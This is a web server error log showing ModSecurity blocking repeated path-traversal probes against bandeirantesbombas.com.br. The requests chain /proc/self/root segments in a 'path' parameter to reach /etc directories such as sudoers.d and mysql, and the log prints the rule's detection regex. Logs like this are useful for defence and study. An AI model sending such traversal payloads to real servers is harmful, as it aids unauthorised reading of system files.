[Tue Mar 17 18:29:36.035210 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.31:57772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHwKBJNF7axNlVR0UxywAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:45.133895 2026] [proxy_fcgi:error] [pid 29151:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:29:47.289392 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:46292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHyweiSKl8TjouI-Yw8gAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:48.689922 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:46296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHzOyqAr6etmhZHNpBFAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:50.095065 2026] [:error] [pid 7004:tid 140411632822016] [client 74.7.241.31:46298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHzsU6Sx0TG1YjmQjHmwAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:52.340211 2026] [:error] [pid 25836:tid 140411641214720] [client 74.7.241.31:46314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHz4h-PF_25v4hFRCDugAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:53.715674 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:46330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH0QeiSKl8TjouI-Yw-AAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:29:55.831322 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:46340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH0-yqAr6etmhZHNpBGAAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:07.131880 2026] [proxy_fcgi:error] [pid 7004:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33968] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:30:10.348228 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:49388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH4qBJNF7axNlVR0Ux6QAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:15.785576 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:39880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH59a6ubjKNq_cu4YhOAAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:28.157905 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34534] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:30:30.508149 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.228.61:51700] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnH9oh-PF_25v4hFRCDzgAAAQ0"]
[Tue Mar 17 18:30:31.935106 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.244.43:33958] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnH96BJNF7axNlVR0Ux-QAAAAU"]
[Tue Mar 17 18:30:32.494638 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.31:52826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH-AeiSKl8TjouI-YxFgAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:33.818772 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:44052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH-aBJNF7axNlVR0Ux-wAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:34.354994 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.243.128:34006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH-qBJNF7axNlVR0Ux_AAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:30:37.046857 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.243.128:56194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH_cU6Sx0TG1YjmQjHswAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Tue Mar 17 18:30:37.153930 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:44058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH_QeiSKl8TjouI-YxHgAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:39.703474 2026] [:error] [pid 7004:tid 140411683178240] [client 74.7.241.31:50440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnH_8U6Sx0TG1YjmQjHuAAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:41.367169 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:50450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIAXIk7brgkOH-rIWmZAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:46.727603 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:50462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIBhj0p0SRWAqcjGGTgwAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:51.125844 2026] [proxy_fcgi:error] [pid 7437:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:30:53.990772 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:56748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIDQeiSKl8TjouI-YxIgAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:54.208024 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:56748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIDgeiSKl8TjouI-YxIwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:55.737171 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:56748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIDgeiSKl8TjouI-YxJAAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:30:58.965392 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:56760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIEuyqAr6etmhZHNpBQAAAAFI"], referer: 